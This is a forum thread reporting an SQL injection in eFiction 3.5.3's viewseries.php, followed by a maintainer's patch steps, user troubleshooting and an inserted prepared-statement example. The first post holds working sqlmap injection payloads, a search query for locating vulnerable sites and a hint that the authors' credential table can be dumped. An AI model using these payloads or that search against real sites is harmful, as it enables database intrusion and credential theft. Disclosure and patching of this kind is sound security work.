[Sticky] SQL Injection vulnerability in eFiction

(@guest14424)
Posts: 0
 

Hello ...

The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":

    $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

Then it passes the *tainted* value directly down to the database:

    $parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
    ".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");

This allows an attacker to extract information from the underlying database.

    sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
    ---
    Place: GET
    Parameter: seriesid
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV

        Type: error-based
        Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
        Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
    ---
    [20:37:41] [INFO] testing MySQL
    [20:37:42] [INFO] confirming MySQL
    [20:37:45] [INFO] the back-end DBMS is MySQL
    [20:37:45] [INFO] fetching banner
    [20:37:45] [INFO] retrieving the length of query output
    [20:37:45] [INFO] retrieved: 20
    [20:38:25] [INFO] retrieved: 5.1.69-community-log
    [20:38:25] [INFO] actively fingerprinting MySQL
    [20:38:28] [INFO] executing MySQL comment injection fingerprint
    web application technology: Apache, PHP 5.2.17
    back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
              banner parsing fingerprint: MySQL 5.1.69, logging enabled
    banner:    '5.1.69-community-log'

Vulnerable sites can be found using Google by executing this search:

    inurl:"viewseries.php?seriesid="

The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.

Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.

... Robert


 
Posted : 12/11/2014 8:46 pm
(@sheepcontrol)
Posts: 332
Reputable Member
 

UPDATE: zip-archive attached with the modified files.

Thanks for letting us know, here's a fix, and YOU NEED TO DO THIS A.S.A.P.

Step 1:
Open includes/mysqli_functions.php, find:

    // Used to escape text being put into the database.
    function escapestring($str) {
    global $dbconnect;
      return $dbconnect->real_escape_string($str);
    }

Modify to:

    // Used to escape text being put into the database.
    function escapestring($str) {
    global $dbconnect;
      if (!is_array($str)) return $dbconnect->real_escape_string($str);
      return array_map('escapestring', $str);
    }

(You can skip step 2 if you know you are using the mysqli extension; if you are not sure, better do it.)
Step 2:
Open includes/mysql_functions.php, find at or around line 56:

    // Used to escape text being put into the database.
    function escapestring($str) {
      if(version_compare(phpversion(),"4.3.0")=="-1") {
        $str = mysql_escape_string($str);
      } else {
        $str = mysql_real_escape_string($str);
      }
      return $str;
    }

Modify to:

    // Used to escape text being put into the database.
    function escapestring($str) {
      if (!is_array($str)) return mysql_real_escape_string($str);
      else return array_map('escapestring', $str);
    }

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

Step 3:
Completely scratched for breaking several forms.

Step 4:
Open viewseries.php, find around line 36:

    include(_BASEDIR."includes/pagesetup.php");


    $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

change last line of above to:

    $seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

First tests indicate this is
1) working
2) fixing the injection issue
3) should work now

Update #1: Added viewseries.php as file to be modified
Update #2: Fixed a typo above, Step 1 hits includes/mysqli_functions.php, Step 2 goes for includes/mysql_functions.php
Update #3: Convenience fix, packed the affected files in a zip-archive, just unpack and upload, do not edit anything else.

I am sorry, this may seem a bit unorganized, and in fact it is. That has to do with the fact that I am not really into the 3.5.3 code; I merely took the project over with the intention of bringing it to version 5.0.0, which is underway but not quite ready for release.

Updated package is postponed, also, until this fix has become somewhat stable.


 
Posted : 13/11/2014 5:31 am
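The query from Robert's first post and the is_numeric() check from Step 4 of the fix, shown side by side as an added example (not eFiction's own code, and the function names parents_unsafe, validate_seriesid and parents_safe are mine): the hardened version validates seriesid as an integer and binds it with a mysqli prepared statement instead of escaping and quoting it. It assumes the $dbconnect mysqli connection and TABLEPREFIX constant that eFiction 3.5.3 uses, and the mysqlnd driver for get_result().

```php
<?php
// Added example (not eFiction's own code): the unsafe query from the first post next
// to a version that validates seriesid as an integer and binds it with a prepared
// statement, so no quoting or escaping of the value is needed at all.
// Assumes a mysqli connection in $dbconnect and the TABLEPREFIX constant that
// eFiction 3.5.3 uses; get_result() additionally assumes the mysqlnd driver.

// Unsafe: the raw GET value is interpolated into the SQL text. The single quotes
// are the only barrier, and a quote in the input closes them.
function parents_unsafe(mysqli $dbconnect, $seriesid) {
    $sql = "SELECT s.title, s.seriesid FROM " . TABLEPREFIX . "fanfiction_inseries AS i, "
         . TABLEPREFIX . "fanfiction_series AS s "
         . "WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'";
    return $dbconnect->query($sql);
}

// Boundary check: accept only a positive integer. Stricter than is_numeric(),
// which also lets through float and exponent forms such as "1.5" or "1e3".
function validate_seriesid($raw) {
    if (!is_string($raw) && !is_int($raw)) {
        return false;
    }
    return filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
}

// Safe: the validated integer is passed as a bound parameter and never becomes
// part of the SQL text, so the sqlmap payloads shown above cannot reach the parser.
function parents_safe(mysqli $dbconnect, $raw) {
    $seriesid = validate_seriesid($raw);
    if ($seriesid === false) {
        return false;   // rejects e.g. "1' AND SLEEP(5) AND 'hXxL'='hXxL"
    }
    $sql = "SELECT s.title, s.seriesid FROM " . TABLEPREFIX . "fanfiction_inseries AS i "
         . "JOIN " . TABLEPREFIX . "fanfiction_series AS s ON s.seriesid = i.seriesid "
         . "WHERE i.subseriesid = ?";
    $stmt = $dbconnect->prepare($sql);
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('i', $seriesid);
    $stmt->execute();
    return $stmt->get_result();
}

// Constructed inputs: '42' and 42 pass; the rest are rejected before any SQL runs.
foreach (['42', 42, '1e3', '1.5', '-1', "1' AND 9530=9530 AND 'xaMV'='xaMV"] as $in) {
    var_dump(validate_seriesid($in));
}
```

The is_numeric() plus escapestring() approach in Step 4 also blocks the injection, since a value that passes is_numeric() cannot contain a quote; the bound parameter simply removes the dependence on escaping and quoting being done correctly at every call site.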
(@sheepcontrol)
Posts: 332
Reputable Member
 

Ran a test: because $seriesid is used straightforwardly to build links, it still shows up as injected, but the actual DB query is safe.


 
Posted : 13/11/2014 7:31 am
(@kaehana)
Posts: 3
New Member
 

I did this change, but now when I click the submit button everything is OK, but when I want to echo the inserted text, it shows "rn" between the lines (in the database it shows rn). I tried to remove these tags but they don't disappear. How could I remove these tags?


 
Posted : 13/11/2014 8:51 am
(@purpleyin)
Posts: 16
Active Member
 

(You can skip step 2 if you know you are using the mysqli extension; if you are not sure, better do it.)
Step 2:
Open includes/mysqli_functions.php, find at or around line 56:

    // Used to escape text being put into the database.
    function escapestring($str) {
      if(version_compare(phpversion(),"4.3.0")=="-1") {
        $str = mysql_escape_string($str);
      } else {
        $str = mysql_real_escape_string($str);
      }
      return $str;
    }

Modify to:

    // Used to escape text being put into the database.
    function escapestring($str) {
      if (!is_array($str)) return mysql_real_escape_string($str);
      else return array_map('escapestring', $str);
    }

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so I was assuming there's a tiny typo in step 2, or am I wrong and are my files different than expected somehow?


 
Posted : 13/11/2014 8:54 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so I was assuming there's a tiny typo in step 2, or am I wrong and are my files different than expected somehow?

Yes, there was a typo in the instructions, Step 1 was mysqli, Step 2 mysql.
Thanks


 
Posted : 13/11/2014 9:25 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

I did this change, but now when I click the submit button everything is OK, but when I want to echo the inserted text, it shows "rn" between the lines (in the database it shows rn). I tried to remove these tags but they don't disappear. How could I remove these tags?

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.


 
Posted : 13/11/2014 9:26 am
(@kaehana)
Posts: 3
New Member
 

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.

Thank you, now it's OK.


 
Posted : 13/11/2014 10:10 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

Thanks for the feedback, good to know.


 
Posted : 13/11/2014 10:27 am
(@darklight)
Posts: 170
Estimable Member
 

Thank you for getting on this so quick!


 
Posted : 13/11/2014 11:39 am
(@kaehana)
Posts: 3
New Member
 

Series doesn't show with

    $seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get an error in line 39 of viewseries.php.

But it's OK if I use:

    $seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I don't know if it is OK to use this last code.


 
Posted : 13/11/2014 11:53 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

Series doesn't show with

    $seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get an error in line 39 of viewseries.php.

But it's OK if I use:

    $seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I don't know if it is OK to use this last code.

Now I have no idea why that doesn't work for you, double checked with my test site and it's just fine there, but your version seems to be ok, too.


 
Posted : 13/11/2014 12:08 pm
 Sue
(@sue)
Posts: 131
Estimable Member
 

Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.


 
Posted : 13/11/2014 3:48 pm
(@charl)
Posts: 17
Active Member
 

A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!


 
Posted : 13/11/2014 6:05 pm
(@sheepcontrol)
Posts: 332
Reputable Member
 

A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

I copied the code from an original version of eFiction 3.5.3, so if your files did indeed differ, that's strange.
Anyway, I couldn't sleep, so I made the hotfix. The full package, including a few other fixes that came up, will follow within the next days; I've got family festivities coming my way.


 
Posted : 13/11/2014 9:54 pm